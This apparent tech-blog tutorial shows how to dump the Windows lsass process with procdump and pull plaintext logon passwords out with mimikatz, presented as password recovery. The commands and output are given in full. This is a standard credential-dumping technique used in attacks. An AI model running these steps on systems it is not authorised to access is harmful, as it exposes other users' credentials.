from https://michlstechblog.info/blog/windows-recover-lost-passwords-from-memory/
Hi,
if a user is logged on and has forgotten their password, you can dump the lsass process and recover the password from the dump file.
Two tools are needed:
- Microsoft's Sysinternals procdump
- mimikatz, a tool to play with Windows security. Take care when downloading precompiled binaries. Better get the source code from GitHub and compile it yourself; it's very easy.
Let's start. Log in as a user with administrator permissions and dump the lsass process:
C:\>procdump.exe -accepteula -ma lsass.exe %TEMP%\lsass.dmp
ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

[09:53:48] Dump 1 initiated: C:\Users\user\AppData\Local\Temp\lsass.dmp
[09:53:55] Dump 1 writing: Estimated dump file size is 42 MB.
[09:53:55] Dump 1 complete: 42 MB written in 7.5 seconds
[09:53:56] Dump count reached.
Recover the lost information. Start the mimikatz interactive shell:
C:\> mimikatz.exe
To get help, type a double colon (::); for help on a module, type the module name followed by the double colon, e.g. sekurlsa::
Open the dmp file:
mimikatz # sekurlsa::minidump C:\Users\user\AppData\Local\Temp\lsass.dmp
Switch to MINIDUMP : 'C:\Users\user\AppData\Local\Temp\lsass.dmp'
And get the lost information:
mimikatz # sekurlsa::logonPasswords
Mimikatz also supports Windows full and crash dumps and VMware vmem files as input. To extract credentials from a raw memory image or a hibernation file, use the mimikatz offline plugin for Volatility.
It's also possible to recover the login credentials directly from the running lsass process. This is the default.
You have to hold the debug privilege to do this, otherwise the error ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) occurs. Also, mimikatz.exe must be compiled for the architecture of the OS in use (x86 or x64), otherwise you get ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonPasswords
CAUTION: Be very careful when using this tool, because it makes extremely sensitive data visible! In your workplace or country this tool may be classified as a hacking tool!
Michael